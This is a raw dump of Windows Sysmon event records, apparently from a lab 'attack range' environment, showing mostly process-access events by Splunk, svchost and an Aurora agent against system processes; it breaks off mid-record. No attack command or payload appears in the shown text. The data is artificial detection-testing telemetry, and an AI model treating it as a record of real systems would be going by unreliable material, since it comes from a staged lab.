10341000x800000000000000016673Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E48A-63C7-0902-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016672Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016671Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.371{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E48A-63C7-0902-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016670Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.372{E5A8D418-E48A-63C7-0902-00000000B002}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016669Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:34.050{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246FC5312043021AA88818043889792E,SHA256=313F50BB6A0D23299B5700D8C20015FD415BADB6488EDED894AF0C791A871CED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.794{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.719{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.709{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.705{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.703{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.698{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.696{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.691{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.690{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.690{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.688{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.182{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.181{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:34.181{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program 